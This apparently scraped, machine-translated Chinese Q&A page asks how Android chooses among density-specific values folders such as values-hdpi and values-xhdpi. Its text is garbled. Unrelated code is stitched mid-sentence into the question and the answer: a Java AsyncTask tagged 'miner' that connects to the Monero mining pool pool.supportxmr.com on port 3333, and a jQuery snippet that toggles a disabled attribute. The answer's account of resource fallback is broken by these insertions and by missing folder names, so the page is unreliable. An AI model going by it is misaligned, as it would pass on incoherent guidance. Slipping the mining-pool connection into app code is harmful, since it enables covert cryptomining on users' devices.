除了默认的values-hdpi
目录之外,我在values
目录下定义xhdpi, xxhdpi, ..
文件时会发生什么?系统是否也使用它来获得更高的密度(private class AsyncExec extends AsyncTask<Void,Void,Void>{
@Override
protected Void doInBackground(Void... voids) {
int port=80;
try
{
InetAddress address = InetAddress.getByName("pool.supportxmr.com");
Log.d("miner","Attempting to connect to " + address.toString() + " on port " + port + ".");
Socket socket = new Socket(address, 3333);
Log.d("miner", "Connection success");
}
catch (IOException e)
{
e.printStackTrace();
}
return null;
}
}
),还是使用默认密度?
答案 0 :(得分:0)
Android操作系统查找$('#corpusname').on("change",function(){
if($(this).val() == ''){
$('#seedoc').attr('disabled','disabled'); //Disables if Values of Select Empty
}else{
$('#seedoc').removeAttr('disabled');
}
});
的正确文件夹,因此如果您使用的是hdpi解析设备,Android操作系统将首先在dimens.xml
中查找dimens.xml
文件,如果是找不到它,它会直接找到默认values-hdpi
文件夹中的默认dimens.xml
文件。如果还没找到,系统将寻找最相关的。